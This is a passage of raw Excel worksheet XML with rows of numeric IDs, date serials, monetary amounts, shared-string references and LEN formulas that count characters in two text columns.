        <v>43949</v>
      </c>
      <c r="H642">
        <v>60000</v>
      </c>
      <c r="J642" t="s">
        <v>10810</v>
      </c>
      <c r="K642">
        <f>LEN(I642)</f>
        <v>0</v>
      </c>
      <c r="L642">
        <f>LEN(J642)</f>
        <v>29</v>
      </c>
    </row>
    <row r="643" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A643">
        <v>20562</v>
      </c>
      <c r="B643">
        <v>2695</v>
      </c>
      <c r="C643" t="s">
        <v>5948</v>
      </c>
      <c r="D643" t="s">
        <v>10809</v>
      </c>
      <c r="E643">
        <v>11</v>
      </c>
      <c r="F643" t="s">
        <v>9955</v>
      </c>
      <c r="G643" s="1">
        <v>43949</v>
      </c>
      <c r="H643">
        <v>60000</v>
      </c>
      <c r="J643" t="s">
        <v>10810</v>
      </c>
      <c r="K643">
        <f>LEN(I643)</f>
        <v>0</v>
      </c>
      <c r="L643">
        <f>LEN(J643)</f>
        <v>29</v>
      </c>
    </row>
    <row r="644" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A644">
        <v>19618</v>
      </c>
      <c r="B644">
        <v>610</v>
      </c>
      <c r="C644" t="s">
        <v>327</v>
      </c>
      <c r="D644" t="s">
        <v>9969</v>
      </c>
      <c r="E644">
        <v>26</v>
      </c>
      <c r="F644" t="s">
        <v>4686</v>
      </c>
      <c r="G644" s="1">
        <v>43923</v>
      </c>
      <c r="H644">
        <v>70000</v>
      </c>
      <c r="I644" t="s">
        <v>10003</v>
      </c>
      <c r="J644" t="s">
        <v>10133</v>
      </c>
      <c r="K644">
        <f>LEN(I644)</f>
        <v>33</v>
      </c>
      <c r="L644">
        <f>LEN(J644)</f>
        <v>28</v>
      </c>
    </row>
    <row r="645" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A645">
        <v>19619</v>
      </c>
      <c r="B645">
        <v>610</v>
      </c>
      <c r="C645" t="s">
        <v>327</v>
      </c>
      <c r="D645" t="s">
        <v>9969</v>
      </c>
      <c r="E645">
        <v>26</v>
      </c>
      <c r="F645" t="s">
        <v>10134</v>
      </c>
      <c r="G645" s="1">
        <v>43923</v>
      </c>
      <c r="H645">
        <v>40000</v>
      </c>
      <c r="I645" t="s">
        <v>10003</v>
      </c>
      <c r="J645" t="s">
        <v>10133</v>
      </c>
      <c r="K645">
        <f>LEN(I645)</f>
        <v>33</v>
      </c>
      <c r="L645">
        <f>LEN(J645)</f>
        <v>28</v>
      </c>
    </row>
    <row r="646" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A646">
        <v>19620</v>
      </c>
      <c r="B646">
        <v>610</v>
      </c>
      <c r="C646" t="s">
        <v>327</v>
      </c>
      <c r="D646" t="s">
        <v>9969</v>
      </c>
      <c r="E646">
        <v>26</v>
      </c>
      <c r="F646" t="s">
        <v>10135</v>
      </c>
      <c r="G646" s="1">
        <v>43923</v>
      </c>
      <c r="H646">
        <v>40000</v>
      </c>
      <c r="I646" t="s">
        <v>10003</v>
      </c>
      <c r="J646" t="s">
        <v>10133</v>
      </c>
      <c r="K646">
        <f>LEN(I646)</f>
        <v>33</v>
      </c>
      <c r="L646">
        <f>LEN(J646)</f>
        <v>28</v>
      </c>
    </row>
    <row r="647" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A647">
        <v>19796</v>
      </c>
      <c r="B647">
        <v>226</v>
      </c>
      <c r="C647" t="s">
        <v>502</v>
      </c>
      <c r="D647" t="s">
        <v>10242</v>
      </c>
      <c r="E647">
        <v>16</v>
      </c>
      <c r="F647" t="s">
        <v>673</v>
      </c>
      <c r="G647" s="1">
        <v>43922</v>
      </c>
      <c r="H647">
        <v>67767</v>
      </c>
      <c r="J647" t="s">
        <v>10243</v>
      </c>
      <c r="K647">
        <f>LEN(I647)</f>
        <v>0</v>
      </c>
      <c r="L647">
        <f>LEN(J647)</f>
        <v>28</v>
      </c>
    </row>
    <row r="648" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A648">
        <v>20906</v>
      </c>
      <c r="B648">
        <v>227</v>
      </c>
      <c r="C648" t="s">
        <v>671</v>
      </c>
      <c r="D648" t="s">
        <v>11054</v>
      </c>
      <c r="E648">
        <v>16</v>
      </c>
      <c r="F648" t="s">
        <v>673</v>
      </c>
      <c r="G648" s="1">
        <v>43971</v>
      </c>
      <c r="H648">
        <v>3744000</v>
      </c>
      <c r="J648" t="s">
        <v>10133</v>
      </c>
      <c r="K648">
        <f>LEN(I648)</f>
        <v>0</v>
      </c>
      <c r="L648">
        <f>LEN(J648)</f>
        <v>28</v>
      </c>
    </row>
    <row r="649" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A649">
        <v>21185</v>
      </c>
      <c r="B649">
        <v>1156</v>
      </c>
      <c r="C649" t="s">
        <v>16315</v>
      </c>
      <c r="D649" t="s">
        <v>16316</v>
      </c>
      <c r="E649">
        <v>10</v>
      </c>
      <c r="F649" t="s">
        <v>673</v>
      </c>
      <c r="G649" s="1">
        <v>44019</v>
      </c>
      <c r="H649">
        <v>2484376.89</v>
      </c>
      <c r="I649" t="s">
        <v>9870</v>
      </c>
      <c r="J649" t="s">
        <v>9712</v>
      </c>
      <c r="K649">
        <f>LEN(I649)</f>
        <v>25</v>
      </c>
      <c r="L649">
        <f>LEN(J649)</f>
        <v>27</v>
      </c>
    </row>
    <row r="650" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A650">
        <v>17170</v>
      </c>
      <c r="B650">
        <v>2267</v>
      </c>
      <c r="C650" t="s">
        <v>6309</v>
      </c>
      <c r="D650" t="s">
        <v>9707</v>
      </c>
      <c r="E650">
        <v>18</v>
      </c>
      <c r="F650" t="s">
        <v>9710</v>
      </c>
      <c r="G650" s="1">
        <v>43901</v>
      </c>
      <c r="H650">
        <v>5000</v>
      </c>
      <c r="I650" t="s">
        <v>9711</v>
      </c>
      <c r="J650" t="s">
        <v>9712</v>
      </c>
      <c r="K650">
        <f>LEN(I650)</f>
        <v>22</v>
      </c>
      <c r="L650">
        <f>LEN(J650)</f>
        <v>27</v>
      </c>
    </row>
    <row r="651" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A651">
        <v>17176</v>
      </c>
      <c r="B651">
        <v>2267</v>
      </c>
      <c r="C651" t="s">
        <v>6309</v>
      </c>
      <c r="D651" t="s">
        <v>9707</v>
      </c>
      <c r="E651">
        <v>18</v>
      </c>
      <c r="F651" t="s">
        <v>9714</v>
      </c>
      <c r="G651" s="1">
        <v>43901</v>
      </c>
      <c r="H651">
        <v>5000</v>
      </c>
      <c r="I651" t="s">
        <v>9715</v>
      </c>
      <c r="J651" t="s">
        <v>9712</v>
      </c>
      <c r="K651">
        <f>LEN(I651)</f>
        <v>22</v>
      </c>
      <c r="L651">
        <f>LEN(J651)</f>
        <v>27</v>
      </c>
    </row>
    <row r="652" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A652">
        <v>20536</v>
      </c>
      <c r="B652">
        <v>2667</v>
      </c>
      <c r="C652" t="s">
        <v>3535</v>
      </c>
      <c r="D652" t="s">
        <v>10783</v>
      </c>
      <c r="E652">
        <v>16</v>
      </c>
      <c r="F652" t="s">
        <v>673</v>
      </c>
      <c r="G652" s="1">
        <v>43963</v>
      </c>
      <c r="H652">
        <v>1852000</v>
      </c>
      <c r="J652" t="s">
        <v>9712</v>
      </c>
      <c r="K652">
        <f>LEN(I652)</f>
        <v>0</v>
      </c>
      <c r="L652">
        <f>LEN(J652)</f>
        <v>27</v>
      </c>
    </row>
    <row r="653" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A653">
        <v>20537</v>
      </c>
      <c r="B653">
        <v>2667</v>
      </c>
      <c r="C653" t="s">
        <v>3535</v>
      </c>
      <c r="D653" t="s">
        <v>10783</v>
      </c>
      <c r="E653">
        <v>16</v>
      </c>
      <c r="F653" t="s">
        <v>9441</v>
      </c>
      <c r="G653" s="1">
        <v>43963</v>
      </c>
      <c r="H653">
        <v>1852000</v>
      </c>
      <c r="J653" t="s">
        <v>9712</v>
      </c>
      <c r="K653">
        <f>LEN(I653)</f>
        <v>0</v>
      </c>
      <c r="L653">
        <f>LEN(J653)</f>
        <v>27</v>
      </c>
    </row>
    <row r="654" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A654">
        <v>21274</v>
      </c>
      <c r="B654">
        <v>1156</v>
      </c>
      <c r="C654" t="s">
        <v>16315</v>
      </c>
      <c r="D654" t="s">
        <v>16316</v>
      </c>
      <c r="E654">
        <v>10</v>
      </c>
      <c r="F654" t="s">
        <v>9441</v>
      </c>
      <c r="G654" s="1">
        <v>44019</v>
      </c>
      <c r="H654">
        <v>2484376.89</v>
      </c>
      <c r="J654" t="s">
        <v>9712</v>
      </c>
      <c r="K654">
        <f>LEN(I654)</f>
        <v>0</v>
      </c>
      <c r="L654">
        <f>LEN(J654)</f>
        <v>27</v>
      </c>
    </row>
    <row r="655" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A655">
        <v>21249</v>
      </c>
      <c r="B655">
        <v>4787</v>
      </c>
      <c r="C655" t="s">
        <v>7155</v>
      </c>
      <c r="D655" t="s">
        <v>11249</v>
      </c>
      <c r="E655">
        <v>24</v>
      </c>
      <c r="F655" t="s">
        <v>11250</v>
      </c>
      <c r="G655" s="1">
        <v>44053</v>
      </c>
      <c r="H655">
        <v>150000</v>
      </c>
      <c r="I655" t="s">
        <v>11251</v>
      </c>
      <c r="J655" t="s">
        <v>10662</v>
      </c>
      <c r="K655">
        <f>LEN(I655)</f>
        <v>98</v>
      </c>
      <c r="L655">
        <f>LEN(J655)</f>
        <v>26</v>
      </c>
    </row>
    <row r="656" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A656">
        <v>21250</v>
      </c>
      <c r="B656">
        <v>4787</v>
      </c>
      <c r="C656" t="s">
        <v>7155</v>
      </c>
      <c r="D656" t="s">
        <v>11249</v>
      </c>
      <c r="E656">
        <v>24</v>
      </c>
      <c r="F656" t="s">
        <v>11252</v>
      </c>
      <c r="G656" s="1">
        <v>44053</v>
      </c>
      <c r="H656">
        <v>970000</v>
      </c>
      <c r="I656" t="s">
        <v>11251</v>
      </c>
      <c r="J656" t="s">
        <v>10662</v>
      </c>
      <c r="K656">
        <f>LEN(I656)</f>
        <v>98</v>
      </c>
      <c r="L656">
        <f>LEN(J656)</f>
        <v>26</v>
      </c>
    </row>
    <row r="657" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A657">
        <v>19306</v>
      </c>
      <c r="B657">
        <v>2353</v>
      </c>
      <c r="C657" t="s">
        <v>4876</v>
      </c>
      <c r="D657" t="s">
        <v>9906</v>
      </c>
      <c r="E657">
        <v>34</v>
      </c>
      <c r="F657" t="s">
        <v>5434</v>
      </c>
      <c r="G657" s="1">
        <v>43859</v>
      </c>
      <c r="H657">
        <v>200000</v>
      </c>
      <c r="I657" t="s">
        <v>9550</v>
      </c>
      <c r="J657" t="s">
        <v>9913</v>
      </c>
      <c r="K657">
        <f>LEN(I657)</f>
        <v>18</v>
      </c>
      <c r="L657">
        <f>LEN(J657)</f>
        <v>26</v>
      </c>
    </row>
    <row r="658" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A658">
        <v>19910</v>
      </c>
      <c r="B658">
        <v>2134</v>
      </c>
      <c r="C658" t="s">
        <v>5492</v>
      </c>
      <c r="D658" t="s">
        <v>10322</v>
      </c>
      <c r="E658">
        <v>26</v>
      </c>
      <c r="F658" t="s">
        <v>4686</v>
      </c>
      <c r="G658" s="1">
        <v>43882</v>
      </c>
      <c r="H658">
        <v>15000</v>
      </c>
      <c r="J658" t="s">
        <v>10325</v>
      </c>
      <c r="K658">
        <f>LEN(I658)</f>
        <v>0</v>
      </c>
      <c r="L658">
        <f>LEN(J658)</f>
        <v>26</v>
      </c>
    </row>
    <row r="659" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A659">
        <v>20369</v>
      </c>
      <c r="B659">
        <v>2734</v>
      </c>
      <c r="C659" t="s">
        <v>6018</v>
      </c>
      <c r="D659" t="s">
        <v>10661</v>
      </c>
      <c r="E659">
        <v>14</v>
      </c>
      <c r="F659" t="s">
        <v>2236</v>
      </c>
      <c r="G659" s="1">
        <v>44048</v>
      </c>
      <c r="H659">
        <v>200</v>
      </c>
      <c r="J659" t="s">
        <v>10662</v>
      </c>
      <c r="K659">
        <f>LEN(I659)</f>
        <v>0</v>
      </c>
      <c r="L659">
        <f>LEN(J659)</f>
        <v>26</v>
      </c>
    </row>
    <row r="660" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A660">
        <v>20388</v>
      </c>
      <c r="B660">
        <v>532</v>
      </c>
      <c r="C660" t="s">
        <v>982</v>
      </c>
      <c r="D660" t="s">
        <v>10675</v>
      </c>
      <c r="E660">
        <v>12</v>
      </c>
      <c r="F660" t="s">
        <v>9527</v>
      </c>
      <c r="G660" s="1">
        <v>43949</v>
      </c>
      <c r="H660">
        <v>10000</v>
      </c>
      <c r="J660" t="s">
        <v>10684</v>
      </c>
      <c r="K660">
        <f>LEN(I660)</f>
        <v>0</v>
      </c>
      <c r="L660">
        <f>LEN(J660)</f>
        <v>26</v>
      </c>
    </row>
    <row r="661" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A661">
        <v>20455</v>
      </c>
      <c r="B661">
        <v>2759</v>
      </c>
      <c r="C661" t="s">
        <v>327</v>
      </c>
      <c r="D661" t="s">
        <v>10730</v>
      </c>
      <c r="E661">
        <v>29</v>
      </c>
      <c r="F661" t="s">
        <v>4686</v>
      </c>
      <c r="G661" s="1">
        <v>43930</v>
      </c>
      <c r="H661">
        <v>0</v>
      </c>
      <c r="J661" t="s">
        <v>10684</v>
      </c>
      <c r="K661">
        <f>LEN(I661)</f>
        <v>0</v>
      </c>
      <c r="L661">
        <f>LEN(J661)</f>
        <v>26</v>
      </c>
    </row>
    <row r="662" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A662">
        <v>20594</v>
      </c>
      <c r="B662">
        <v>882</v>
      </c>
      <c r="C662" t="s">
        <v>2992</v>
      </c>
      <c r="D662" t="s">
        <v>10834</v>
      </c>
      <c r="E662">
        <v>2</v>
      </c>
      <c r="F662" t="s">
        <v>1746</v>
      </c>
      <c r="G662" s="1">
        <v>43991</v>
      </c>
      <c r="H662">
        <v>520</v>
      </c>
      <c r="J662" t="s">
        <v>10835</v>
      </c>
      <c r="K662">
        <f>LEN(I662)</f>
        <v>0</v>
      </c>
      <c r="L662">
        <f>LEN(J662)</f>
        <v>26</v>
      </c>
    </row>
    <row r="663" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A663">
        <v>20950</v>
      </c>
      <c r="B663">
        <v>2844</v>
      </c>
      <c r="C663" t="s">
        <v>7038</v>
      </c>
      <c r="D663" t="s">
        <v>11073</v>
      </c>
      <c r="E663">
        <v>16</v>
      </c>
      <c r="F663" t="s">
        <v>364</v>
      </c>
      <c r="G663" s="1">
        <v>44106</v>
      </c>
      <c r="H663">
        <v>25000</v>
      </c>
      <c r="J663" t="s">
        <v>11074</v>
      </c>
      <c r="K663">
        <f>LEN(I663)</f>
        <v>0</v>
      </c>
      <c r="L663">
        <f>LEN(J663)</f>
        <v>26</v>
      </c>
    </row>
    <row r="664" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A664">
        <v>20556</v>
      </c>
      <c r="B664">
        <v>2562</v>
      </c>
      <c r="C664" t="s">
        <v>16317</v>
      </c>
      <c r="D664" t="s">
        <v>16318</v>
      </c>
      <c r="E664">
        <v>13</v>
      </c>
      <c r="F664" t="s">
        <v>1455</v>
      </c>
      <c r="G664" s="1">
        <v>43956</v>
      </c>
      <c r="H664" s="4">
        <v>4000000</v>
      </c>
      <c r="I664" t="s">
        <v>10806</v>
      </c>
      <c r="J664" t="s">
        <v>10807</v>
      </c>
      <c r="K664">
        <f>LEN(I664)</f>
        <v>40</v>
      </c>
      <c r="L664">
        <f>LEN(J664)</f>
        <v>25</v>
      </c>
    </row>
    <row r="665" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A665">
        <v>19336</v>
      </c>
      <c r="B665">
        <v>325</v>
      </c>
      <c r="C665" t="s">
        <v>248</v>
      </c>
      <c r="D665" t="s">
        <v>9932</v>
      </c>
      <c r="E665">
        <v>11</v>
      </c>
      <c r="F665" t="s">
        <v>9437</v>
      </c>
      <c r="G665" s="1">
        <v>43847</v>
      </c>
      <c r="H665">
        <v>500000</v>
      </c>
      <c r="I665" t="s">
        <v>9933</v>
      </c>
      <c r="J665" t="s">
        <v>9934</v>
      </c>
      <c r="K665">
        <f>LEN(I665)</f>
        <v>16</v>
      </c>
      <c r="L665">
        <f>LEN(J665)</f>
        <v>25</v>
      </c>
    </row>
    <row r="666" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A666">
        <v>19337</v>
      </c>
      <c r="B666">
        <v>325</v>
      </c>
      <c r="C666" t="s">
        <v>248</v>
      </c>
      <c r="D666" t="s">
        <v>9932</v>
      </c>
      <c r="E666">
        <v>11</v>
      </c>
      <c r="F666" t="s">
        <v>9935</v>
      </c>
      <c r="G666" s="1">
        <v>43847</v>
      </c>
      <c r="H666">
        <v>300000</v>
      </c>
      <c r="I666" t="s">
        <v>9933</v>
      </c>
      <c r="J666" t="s">
        <v>9934</v>
      </c>
      <c r="K666">
        <f>LEN(I666)</f>
        <v>16</v>
      </c>
      <c r="L666">
        <f>LEN(J666)</f>
        <v>25</v>
      </c>
    </row>
    <row r="667" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A667">
        <v>19338</v>
      </c>
      <c r="B667">
        <v>325</v>
      </c>
      <c r="C667" t="s">
        <v>248</v>
      </c>
      <c r="D667" t="s">
        <v>9932</v>
      </c>
      <c r="E667">
        <v>11</v>
      </c>
      <c r="F667" t="s">
        <v>9936</v>
      </c>
      <c r="G667" s="1">
        <v>43847</v>
      </c>
      <c r="H667">
        <v>100000</v>
      </c>
      <c r="I667" t="s">
        <v>9933</v>
      </c>
      <c r="J667" t="s">
        <v>9934</v>
      </c>
      <c r="K667">
        <f>LEN(I667)</f>
        <v>16</v>
      </c>
      <c r="L667">
        <f>LEN(J667)</f>
        <v>25</v>
      </c>
    </row>
    <row r="668" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A668">
        <v>19339</v>
      </c>
      <c r="B668">
        <v>325</v>
      </c>
      <c r="C668" t="s">
        <v>248</v>
      </c>
      <c r="D668" t="s">
        <v>9932</v>
      </c>
      <c r="E668">
        <v>11</v>
      </c>
      <c r="F668" t="s">
        <v>1746</v>
      </c>
      <c r="G668" s="1">
        <v>43847</v>
      </c>
      <c r="H668">
        <v>150000</v>
      </c>
      <c r="I668" t="s">
        <v>9933</v>
      </c>
      <c r="J668" t="s">
        <v>9934</v>
      </c>
      <c r="K668">
        <f>LEN(I668)</f>
        <v>16</v>
      </c>
      <c r="L668">
        <f>LEN(J668)</f>
        <v>25</v>
      </c>
    </row>
    <row r="669" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A669">
        <v>19340</v>
      </c>
      <c r="B669">
        <v>324</v>
      </c>
      <c r="C669" t="s">
        <v>258</v>
      </c>
      <c r="D669" t="s">
        <v>9937</v>
      </c>
      <c r="E669">
        <v>11</v>
      </c>
      <c r="F669" t="s">
        <v>9938</v>
      </c>
      <c r="G669" s="1">
        <v>43847</v>
      </c>
      <c r="H669">
        <v>500000</v>
      </c>
      <c r="I669" t="s">
        <v>9933</v>
      </c>
      <c r="J669" t="s">
        <v>9934</v>
      </c>
      <c r="K669">
        <f>LEN(I669)</f>
        <v>16</v>
      </c>
      <c r="L669">
        <f>LEN(J669)</f>
        <v>25</v>
      </c>
    </row>
    <row r="670" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A670">
        <v>19341</v>
      </c>
      <c r="B670">
        <v>324</v>
      </c>
      <c r="C670" t="s">
        <v>258</v>
      </c>
      <c r="D670" t="s">
        <v>9937</v>
      </c>
      <c r="E670">
        <v>11</v>
      </c>
      <c r="F670" t="s">
        <v>9939</v>
      </c>
      <c r="G670" s="1">
        <v>43847</v>
      </c>
      <c r="H670">
        <v>300000</v>
      </c>
      <c r="I670" t="s">
        <v>9933</v>
      </c>
      <c r="J670" t="s">
        <v>9934</v>
      </c>
      <c r="K670">
        <f>LEN(I670)</f>
        <v>16</v>
      </c>
      <c r="L670">
        <f>LEN(J670)</f>
        <v>25</v>
      </c>
    </row>
    <row r="671" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A671">
        <v>19342</v>
      </c>
      <c r="B671">
        <v>324</v>
      </c>
      <c r="C671" t="s">
        <v>258</v>
      </c>
      <c r="D671" t="s">
        <v>9937</v>
      </c>
      <c r="E671">
        <v>11</v>
      </c>
      <c r="F671" t="s">
        <v>9940</v>
      </c>
      <c r="G671" s="1">
        <v>43847</v>
      </c>
      <c r="H671">
        <v>150000</v>
      </c>
      <c r="I671" t="s">
        <v>9933</v>
      </c>
      <c r="J671" t="s">
        <v>9934</v>
      </c>
      <c r="K671">
        <f>LEN(I671)</f>
        <v>16</v>
      </c>
      <c r="L671">
        <f>LEN(J671)</f>
        <v>25</v>
      </c>
    </row>
    <row r="672" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A672">
        <v>19343</v>
      </c>
      <c r="B672">
        <v>324</v>
      </c>
      <c r="C672" t="s">
        <v>258</v>
      </c>
      <c r="D672" t="s">
        <v>9937</v>
      </c>
      <c r="E672">
        <v>11</v>
      </c>
      <c r="F672" t="s">
        <v>1746</v>
      </c>
      <c r="G672" s="1">
        <v>43847</v>
      </c>
      <c r="H672">
        <v>150000</v>
      </c>
      <c r="I672" t="s">
        <v>9933</v>
      </c>
      <c r="J672" t="s">
        <v>9934</v>
      </c>
      <c r="K672">
        <f>LEN(I672)</f>
        <v>16</v>
      </c>
      <c r="L672">
        <f>LEN(J672)</f>
        <v>25</v>
      </c>
    </row>
    <row r="673" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A673">
        <v>19344</v>
      </c>
      <c r="B673">
        <v>324</v>
      </c>
      <c r="C673" t="s">
        <v>258</v>
      </c>
      <c r="D673" t="s">
        <v>9937</v>
      </c>
      <c r="E673">
        <v>11</v>
      </c>
      <c r="F673" t="s">
        <v>9681</v>
      </c>
      <c r="G673" s="1">
        <v>43847</v>
      </c>
      <c r="H673">
        <v>100000</v>
      </c>
      <c r="I673" t="s">
        <v>9933</v>
      </c>
      <c r="J673" t="s">
        <v>9934</v>
      </c>
      <c r="K673">
        <f>LEN(I673)</f>
        <v>16</v>
      </c>
      <c r="L673">
        <f>LEN(J673)</f>
        <v>25</v>
      </c>
    </row>
    <row r="674" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A674">
        <v>19393</v>
      </c>
      <c r="B674">
        <v>2361</v>
      </c>
      <c r="C674" t="s">
        <v>9997</v>
      </c>
      <c r="D674" t="s">
        <v>9998</v>
      </c>
      <c r="E674">
        <v>16</v>
      </c>
      <c r="F674" t="s">
        <v>9999</v>
      </c>
      <c r="G674" s="1">
        <v>43913</v>
      </c>
      <c r="H674">
        <v>3000000</v>
      </c>
      <c r="I674" t="s">
        <v>9536</v>
      </c>
      <c r="J674" t="s">
        <v>10000</v>
      </c>
      <c r="K674">
        <f>LEN(I674)</f>
        <v>13</v>
      </c>
      <c r="L674">
        <f>LEN(J674)</f>
        <v>25</v>
      </c>
    </row>
    <row r="675" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A675">
        <v>19394</v>
      </c>
      <c r="B675">
        <v>2361</v>
      </c>
      <c r="C675" t="s">
        <v>9997</v>
      </c>
      <c r="D675" t="s">
        <v>9998</v>
      </c>
      <c r="E675">
        <v>16</v>
      </c>
      <c r="F675" t="s">
        <v>609</v>
      </c>
      <c r="G675" s="1">
        <v>43913</v>
      </c>
      <c r="H675">
        <v>3000000</v>
      </c>
      <c r="I675" t="s">
        <v>9536</v>
      </c>
      <c r="J675" t="s">
        <v>10000</v>
      </c>
      <c r="K675">
        <f>LEN(I675)</f>
        <v>13</v>
      </c>
      <c r="L675">
        <f>LEN(J675)</f>
        <v>25</v>
      </c>
    </row>
    <row r="676" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A676">
        <v>20778</v>
      </c>
      <c r="B676">
        <v>286</v>
      </c>
      <c r="C676" t="s">
        <v>1213</v>
      </c>
      <c r="D676" t="s">
        <v>10971</v>
      </c>
      <c r="E676">
        <v>16</v>
      </c>
      <c r="F676" t="s">
        <v>1455</v>
      </c>
      <c r="G676" s="1">
        <v>43987</v>
      </c>
      <c r="H676">
        <v>2000000</v>
      </c>
      <c r="I676" t="s">
        <v>9536</v>
      </c>
      <c r="J676" t="s">
        <v>10000</v>
      </c>
      <c r="K676">
        <f>LEN(I676)</f>
        <v>13</v>
      </c>
      <c r="L676">
        <f>LEN(J676)</f>
        <v>25</v>
      </c>
    </row>
    <row r="677" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A677">
        <v>20185</v>
      </c>
      <c r="B677">
        <v>367</v>
      </c>
      <c r="C677" t="s">
        <v>744</v>
      </c>
      <c r="D677" t="s">
        <v>10528</v>
      </c>
      <c r="E677">
        <v>14</v>
      </c>
      <c r="F677" t="s">
        <v>6513</v>
      </c>
      <c r="G677" s="1">
        <v>44217</v>
      </c>
      <c r="H677">
        <v>9000</v>
      </c>
      <c r="J677" t="s">
        <v>10000</v>
      </c>
      <c r="K677">
        <f>LEN(I677)</f>
        <v>0</v>
      </c>
      <c r="L677">
        <f>LEN(J677)</f>
        <v>25</v>
      </c>
    </row>
    <row r="678" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A678">
        <v>20631</v>
      </c>
      <c r="B678">
        <v>768</v>
      </c>
      <c r="C678" t="s">
        <v>16319</v>
      </c>
      <c r="D678" t="s">
        <v>16320</v>
      </c>
      <c r="E678">
        <v>16</v>
      </c>
      <c r="F678" t="s">
        <v>10859</v>
      </c>
      <c r="G678" s="1">
        <v>44032</v>
      </c>
      <c r="H678" s="4">
        <v>1080000</v>
      </c>
      <c r="J678" t="s">
        <v>10860</v>
      </c>
      <c r="K678">
        <f>LEN(I678)</f>
        <v>0</v>
      </c>
      <c r="L678">
        <f>LEN(J678)</f>
        <v>25</v>
      </c>
    </row>
    <row r="679" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A679">
        <v>21075</v>
      </c>
      <c r="B679">
        <v>764</v>
      </c>
      <c r="C679" t="s">
        <v>1382</v>
      </c>
      <c r="D679" t="s">
        <v>11124</v>
      </c>
      <c r="E679">
        <v>16</v>
      </c>
      <c r="F679" t="s">
        <v>4037</v>
      </c>
      <c r="G679" s="1">
        <v>44070</v>
      </c>
      <c r="H679">
        <v>318900</v>
      </c>
      <c r="J679" t="s">
        <v>10000</v>
      </c>
      <c r="K679">
        <f>LEN(I679)</f>
        <v>0</v>
      </c>
      <c r="L679">
        <f>LEN(J679)</f>
        <v>25</v>
      </c>
    </row>
    <row r="680" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A680">
        <v>21170</v>
      </c>
      <c r="B680">
        <v>1811</v>
      </c>
      <c r="C680" t="s">
        <v>6117</v>
      </c>
      <c r="D680" t="s">
        <v>11182</v>
      </c>
      <c r="E680">
        <v>26</v>
      </c>
      <c r="F680" t="s">
        <v>3499</v>
      </c>
      <c r="G680" s="1">
        <v>44096</v>
      </c>
      <c r="H680">
        <v>40000</v>
      </c>
      <c r="J680" t="s">
        <v>10000</v>
      </c>
      <c r="K680">
        <f>LEN(I680)</f>
        <v>0</v>
      </c>
      <c r="L680">
        <f>LEN(J680)</f>
        <v>25</v>
      </c>
    </row>
    <row r="681" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A681">
        <v>19942</v>
      </c>
      <c r="B681">
        <v>2331</v>
      </c>
      <c r="C681" t="s">
        <v>16321</v>
      </c>
      <c r="D681" t="s">
        <v>16322</v>
      </c>
      <c r="E681">
        <v>26</v>
      </c>
      <c r="F681" t="s">
        <v>9527</v>
      </c>
      <c r="G681" s="1">
        <v>43909</v>
      </c>
      <c r="H681" s="4">
        <v>2500</v>
      </c>
      <c r="I681" t="s">
        <v>10010</v>
      </c>
      <c r="J681" t="s">
        <v>10331</v>
      </c>
      <c r="K681">
        <f>LEN(I681)</f>
        <v>33</v>
      </c>
      <c r="L681">
        <f>LEN(J681)</f>
        <v>24</v>
      </c>
    </row>
    <row r="682" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A682">
        <v>20153</v>
      </c>
      <c r="B682">
        <v>2611</v>
      </c>
      <c r="C682" t="s">
        <v>5505</v>
      </c>
      <c r="D682" t="s">
        <v>10332</v>
      </c>
      <c r="E682">
        <v>19</v>
      </c>
      <c r="F682" t="s">
        <v>10513</v>
      </c>
      <c r="G682" s="1">
        <v>43881</v>
      </c>
      <c r="H682">
        <v>50000</v>
      </c>
      <c r="I682" t="s">
        <v>9485</v>
      </c>
      <c r="J682" t="s">
        <v>9785</v>
      </c>
      <c r="K682">
        <f>LEN(I682)</f>
        <v>18</v>
      </c>
      <c r="L682">
        <f>LEN(J682)</f>
        <v>24</v>
      </c>
    </row>
    <row r="683" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A683">
        <v>19920</v>
      </c>
      <c r="B683">
        <v>235</v>
      </c>
      <c r="C683" t="s">
        <v>486</v>
      </c>
      <c r="D683" t="s">
        <v>10198</v>
      </c>
      <c r="E683">
        <v>16</v>
      </c>
      <c r="F683" t="s">
        <v>9672</v>
      </c>
      <c r="G683" s="1">
        <v>43885</v>
      </c>
      <c r="H683">
        <v>1000</v>
      </c>
      <c r="I683" t="s">
        <v>9746</v>
      </c>
      <c r="J683" t="s">
        <v>10331</v>
      </c>
      <c r="K683">
        <f>LEN(I683)</f>
        <v>13</v>
      </c>
      <c r="L683">
        <f>LEN(J683)</f>
